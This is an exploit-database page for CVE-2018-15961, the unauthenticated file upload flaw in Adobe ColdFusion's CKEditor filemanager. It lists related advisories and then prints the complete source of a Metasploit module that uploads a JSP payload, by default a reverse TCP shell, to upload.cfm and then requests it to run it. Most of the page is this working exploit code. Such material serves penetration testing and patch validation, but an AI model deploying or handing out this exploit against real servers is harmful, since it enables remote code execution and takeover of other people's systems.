Adobe Coldfusion 11 CKEditor Arbitrary File Upload

🗓️ 10 Jan 2019 00:00:00Reported by Vahagn VardanianType

packetstorm🔗 packetstormsecurity.com👁 177 Views

Adobe ColdFusion CKEditor unrestricted file upload vulnerability in versions 11, 2016, and 2018

Reporter	Title	Published	Views	Family All 38
0day.today	Adobe ColdFusion 2018 - Arbitrary File Upload Vulnerability	12 Dec 201800:00	–	zdt
0day.today	Adobe Coldfusion 11 CKEditor Arbitrary File Upload Exploit	10 Jan 201900:00	–	zdt
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion	3 Oct 202123:31	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Adobe Coldfusion	30 Jun 202108:15	–	githubexploit
ATTACKERKB	Adobe ColdFusion CKEditor file upload	25 Sep 201800:00	–	attackerkb
ATTACKERKB	CVE-2018-15961	25 Sep 201800:00	–	attackerkb
Circl	CVE-2018-15961	12 Nov 201818:53	–	circl
CISA KEV Catalog	Adobe ColdFusion Unrestricted File Upload Vulnerability	3 Nov 202100:00	–	cisa_kev
CNVD	Adobe ColdFusion Arbitrary File Upload Vulnerability	12 Sep 201800:00	–	cnvd
Tenable Nessus	Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)	25 Oct 201900:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
Rank = ExcellentRanking  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',  
'Description' => %q{  
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11  
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and  
ColdFusion 2018 (July 12 release) allows unauthenticated remote  
attackers to upload and execute JSP files through the filemanager  
plugin.  
Tested on Adobe ColdFusion 2018.0.0.310739.  
},  
'Author' =>  
[  
'Pete Freitag de Foundeo', # Vulnerability discovery  
'Vahagn vah_13 Vardanian', # First public PoC  
'Qazeer' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2018-15961' ],  
[ 'BID', '105314' ],  
[ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]  
],  
'Privileged' => false,  
'Platform' => %w{ linux win },  
'Arch' => ARCH_JAVA,  
'Targets' =>  
[  
[ 'Java Universal',  
{  
'Arch' => ARCH_JAVA,  
'Platform' => %w{ linux win },  
'Payload' => { 'DisableNops' => true },  
'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => { 'RPORT' => 8500 },  
'DisclosureDate' => 'Sep 11 2018'  
))  
  
register_options [  
OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),  
]  
end  
  
def exploit  
filename = rand_text_alpha_upper(1..10) + '.jsp'  
  
print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")  
  
mime = Rex::MIME::Message.new  
mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")  
mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')  
  
post_str = mime.to_s  
post_str.strip!  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => 'multipart/form-data; boundary=' + mime.bound,  
'data' => post_str,  
})  
  
unless res && res.code == 200  
fail_with Failure::Unknown, 'Upload Failed...'  
end  
  
print_good('Upload succeeded! Executing payload...')  
  
send_request_cgi({  
'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',  
'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),  
'method' => 'GET'  
}, 5)  
  
end  
end  
`

10 Jan 2019 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.94393